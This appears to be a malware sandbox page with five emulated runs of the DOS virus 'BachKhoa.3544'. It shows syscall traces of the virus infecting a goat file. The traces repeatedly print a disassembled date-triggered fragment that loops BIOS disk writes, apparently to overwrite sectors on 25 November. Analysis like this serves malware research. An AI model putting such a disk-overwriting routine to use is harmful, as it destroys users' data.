Sample viewer

vx.netlux.org/Virus.DOS.BachKhoa.3544

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:35:37.963287351Z	42	PC: 13c84 \| Get date 0x13c84: cmp dx, 0xb19 0x13c88: jne 0x13cab 0x13c8a: mov dx, 0x180 0x13c8d: mov cx, 2 0x13c90: mov ax, 0x30a 0x13c93: xor bx, bx 0x13c95: push cx 0x13c96: push dx 0x13c97: int 0x13 0x13c99: pop dx 0x13c9a: pop cx 0x13c9b: inc ch 0x13c9d: cmp ch, 0xc8 0x13ca0: jb 0x13c90 0x13ca2: xor ch, ch 0x13ca4: inc dh 0x13ca6: cmp dh, 0x3c 0x13ca9: jb 0x13c90 0x13cab: mov ah, 0x2b 0x13cad: popf
2018-12-17T22:35:37.965118235Z	43	PC: 13cc0 \| Set date
2018-12-17T22:35:37.977467856Z	42	PC: 14cc4 \| Get date 0x14cc4: cmp dx, 0xb19 0x14cc8: jne 0x14ceb 0x14cca: mov dx, 0x180 0x14ccd: mov cx, 2 0x14cd0: mov ax, 0x30a 0x14cd3: xor bx, bx 0x14cd5: push cx 0x14cd6: push dx 0x14cd7: int 0x13 0x14cd9: pop dx 0x14cda: pop cx 0x14cdb: inc ch 0x14cdd: cmp ch, 0xc8 0x14ce0: jb 0x14cd0 0x14ce2: xor ch, ch 0x14ce4: inc dh 0x14ce6: cmp dh, 0x3c 0x14ce9: jb 0x14cd0 0x14ceb: mov ah, 0x2b 0x14ced: popf
2018-12-17T22:35:37.979482214Z	43	PC: 14d00 \| Set date
2018-12-17T22:35:37.980557801Z	9	PC: 13ac6 \| Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-17T22:35:37.985624974Z	48	PC: 13acf \| Get DOS version
2018-12-17T22:35:37.987019389Z	61	PC: 13b9c \| Open file (Filename = '')
2018-12-17T22:35:38.011892738Z	93	PC: 13b3e \| File sharing functions
2018-12-17T22:35:38.016372299Z	9	PC: 13ac6 \| Display string (String= 'Size change=0DD8h/03544d. ')
2018-12-17T22:35:38.019896439Z	76	PC: 13b23 \| Terminate with return code (Return code = '1')
2018-12-17T22:35:38.023431108Z	77	PC: 137c7 \| Get program return code

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6424,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:59:18.81092647Z	42	PC: 13c84 \| Get date 0x13c84: cmp dx, 0xb19 0x13c88: jne 0x13cab 0x13c8a: mov dx, 0x180 0x13c8d: mov cx, 2 0x13c90: mov ax, 0x30a 0x13c93: xor bx, bx 0x13c95: push cx 0x13c96: push dx 0x13c97: int 0x13 0x13c99: pop dx 0x13c9a: pop cx 0x13c9b: inc ch 0x13c9d: cmp ch, 0xc8 0x13ca0: jb 0x13c90 0x13ca2: xor ch, ch 0x13ca4: inc dh 0x13ca6: cmp dh, 0x3c 0x13ca9: jb 0x13c90 0x13cab: mov ah, 0x2b 0x13cad: popf
2018-12-25T11:59:18.813828255Z	43	PC: 13cc0 \| Set date
2018-12-25T11:59:18.829830584Z	42	PC: 14cc4 \| Get date 0x14cc4: cmp dx, 0xb19 0x14cc8: jne 0x14ceb 0x14cca: mov dx, 0x180 0x14ccd: mov cx, 2 0x14cd0: mov ax, 0x30a 0x14cd3: xor bx, bx 0x14cd5: push cx 0x14cd6: push dx 0x14cd7: int 0x13 0x14cd9: pop dx 0x14cda: pop cx 0x14cdb: inc ch 0x14cdd: cmp ch, 0xc8 0x14ce0: jb 0x14cd0 0x14ce2: xor ch, ch 0x14ce4: inc dh 0x14ce6: cmp dh, 0x3c 0x14ce9: jb 0x14cd0 0x14ceb: mov ah, 0x2b 0x14ced: popf
2018-12-25T11:59:18.832129198Z	43	PC: 14d00 \| Set date
2018-12-25T11:59:18.833731583Z	9	PC: 13ac6 \| Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T11:59:18.84483337Z	48	PC: 13acf \| Get DOS version
2018-12-25T11:59:18.846470947Z	61	PC: 13b9c \| Open file (Filename = '')
2018-12-25T11:59:19.3997066Z	93	PC: 13b3e \| File sharing functions
2018-12-25T11:59:19.402319467Z	9	PC: 13ac6 \| Display string (See above)
2018-12-25T11:59:19.406545429Z	76	PC: 13b23 \| Terminate with return code (Return code = '1')
2018-12-25T11:59:19.409861513Z	77	PC: 137c7 \| Get program return code

{"DateBased":true,"Day":25,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6424,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:59:18.805863667Z	42	PC: 13c84 \| Get date 0x13c84: cmp dx, 0xb19 0x13c88: jne 0x13cab 0x13c8a: mov dx, 0x180 0x13c8d: mov cx, 2 0x13c90: mov ax, 0x30a 0x13c93: xor bx, bx 0x13c95: push cx 0x13c96: push dx 0x13c97: int 0x13 0x13c99: pop dx 0x13c9a: pop cx 0x13c9b: inc ch 0x13c9d: cmp ch, 0xc8 0x13ca0: jb 0x13c90 0x13ca2: xor ch, ch 0x13ca4: inc dh 0x13ca6: cmp dh, 0x3c 0x13ca9: jb 0x13c90 0x13cab: mov ah, 0x2b 0x13cad: popf
2018-12-25T11:59:21.396022835Z	43	PC: 13cc0 \| Set date
2018-12-25T11:59:21.415244548Z	42	PC: 14cc4 \| Get date 0x14cc4: cmp dx, 0xb19 0x14cc8: jne 0x14ceb 0x14cca: mov dx, 0x180 0x14ccd: mov cx, 2 0x14cd0: mov ax, 0x30a 0x14cd3: xor bx, bx 0x14cd5: push cx 0x14cd6: push dx 0x14cd7: int 0x13 0x14cd9: pop dx 0x14cda: pop cx 0x14cdb: inc ch 0x14cdd: cmp ch, 0xc8 0x14ce0: jb 0x14cd0 0x14ce2: xor ch, ch 0x14ce4: inc dh 0x14ce6: cmp dh, 0x3c 0x14ce9: jb 0x14cd0 0x14ceb: mov ah, 0x2b 0x14ced: popf
2018-12-25T11:59:23.490754125Z	43	PC: 14d00 \| Set date
2018-12-25T11:59:23.492309132Z	9	PC: 13ac6 \| Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T11:59:23.500718781Z	48	PC: 13acf \| Get DOS version
2018-12-25T11:59:23.502379827Z	61	PC: 13b9c \| Open file (Filename = '')
2018-12-25T11:59:23.552034847Z	93	PC: 13b3e \| File sharing functions
2018-12-25T11:59:23.555341838Z	9	PC: 13ac6 \| Display string (See above)
2018-12-25T11:59:23.560369232Z	76	PC: 13b23 \| Terminate with return code (Return code = '1')
2018-12-25T11:59:23.564891079Z	77	PC: 137c7 \| Get program return code

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6424,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:59:18.799794626Z	42	PC: 13c84 \| Get date 0x13c84: cmp dx, 0xb19 0x13c88: jne 0x13cab 0x13c8a: mov dx, 0x180 0x13c8d: mov cx, 2 0x13c90: mov ax, 0x30a 0x13c93: xor bx, bx 0x13c95: push cx 0x13c96: push dx 0x13c97: int 0x13 0x13c99: pop dx 0x13c9a: pop cx 0x13c9b: inc ch 0x13c9d: cmp ch, 0xc8 0x13ca0: jb 0x13c90 0x13ca2: xor ch, ch 0x13ca4: inc dh 0x13ca6: cmp dh, 0x3c 0x13ca9: jb 0x13c90 0x13cab: mov ah, 0x2b 0x13cad: popf
2018-12-25T11:59:18.802614186Z	43	PC: 13cc0 \| Set date
2018-12-25T11:59:18.821720696Z	42	PC: 14cc4 \| Get date 0x14cc4: cmp dx, 0xb19 0x14cc8: jne 0x14ceb 0x14cca: mov dx, 0x180 0x14ccd: mov cx, 2 0x14cd0: mov ax, 0x30a 0x14cd3: xor bx, bx 0x14cd5: push cx 0x14cd6: push dx 0x14cd7: int 0x13 0x14cd9: pop dx 0x14cda: pop cx 0x14cdb: inc ch 0x14cdd: cmp ch, 0xc8 0x14ce0: jb 0x14cd0 0x14ce2: xor ch, ch 0x14ce4: inc dh 0x14ce6: cmp dh, 0x3c 0x14ce9: jb 0x14cd0 0x14ceb: mov ah, 0x2b 0x14ced: popf
2018-12-25T11:59:18.824230231Z	43	PC: 14d00 \| Set date
2018-12-25T11:59:18.825278649Z	9	PC: 13ac6 \| Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T11:59:18.833345923Z	48	PC: 13acf \| Get DOS version
2018-12-25T11:59:18.834807084Z	61	PC: 13b9c \| Open file (Filename = '')
2018-12-25T11:59:18.859842197Z	93	PC: 13b3e \| File sharing functions
2018-12-25T11:59:18.864973403Z	9	PC: 13ac6 \| Display string (See above)
2018-12-25T11:59:18.868817157Z	76	PC: 13b23 \| Terminate with return code (Return code = '1')
2018-12-25T11:59:18.871609299Z	77	PC: 137c7 \| Get program return code

{"DateBased":true,"Day":25,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":6424,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:59:19.022325209Z	42	PC: 13c84 \| Get date 0x13c84: cmp dx, 0xb19 0x13c88: jne 0x13cab 0x13c8a: mov dx, 0x180 0x13c8d: mov cx, 2 0x13c90: mov ax, 0x30a 0x13c93: xor bx, bx 0x13c95: push cx 0x13c96: push dx 0x13c97: int 0x13 0x13c99: pop dx 0x13c9a: pop cx 0x13c9b: inc ch 0x13c9d: cmp ch, 0xc8 0x13ca0: jb 0x13c90 0x13ca2: xor ch, ch 0x13ca4: inc dh 0x13ca6: cmp dh, 0x3c 0x13ca9: jb 0x13c90 0x13cab: mov ah, 0x2b 0x13cad: popf
2018-12-25T11:59:21.396185276Z	43	PC: 13cc0 \| Set date
2018-12-25T11:59:21.416163967Z	42	PC: 14cc4 \| Get date 0x14cc4: cmp dx, 0xb19 0x14cc8: jne 0x14ceb 0x14cca: mov dx, 0x180 0x14ccd: mov cx, 2 0x14cd0: mov ax, 0x30a 0x14cd3: xor bx, bx 0x14cd5: push cx 0x14cd6: push dx 0x14cd7: int 0x13 0x14cd9: pop dx 0x14cda: pop cx 0x14cdb: inc ch 0x14cdd: cmp ch, 0xc8 0x14ce0: jb 0x14cd0 0x14ce2: xor ch, ch 0x14ce4: inc dh 0x14ce6: cmp dh, 0x3c 0x14ce9: jb 0x14cd0 0x14ceb: mov ah, 0x2b 0x14ced: popf
2018-12-25T11:59:23.210290931Z	43	PC: 14d00 \| Set date
2018-12-25T11:59:23.211878886Z	9	PC: 13ac6 \| Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T11:59:23.217632377Z	48	PC: 13acf \| Get DOS version
2018-12-25T11:59:23.220806155Z	61	PC: 13b9c \| Open file (Filename = '')
2018-12-25T11:59:23.254714245Z	93	PC: 13b3e \| File sharing functions
2018-12-25T11:59:23.259261123Z	9	PC: 13ac6 \| Display string (See above)
2018-12-25T11:59:23.269340221Z	76	PC: 13b23 \| Terminate with return code (Return code = '1')
2018-12-25T11:59:23.276688198Z	77	PC: 137c7 \| Get program return code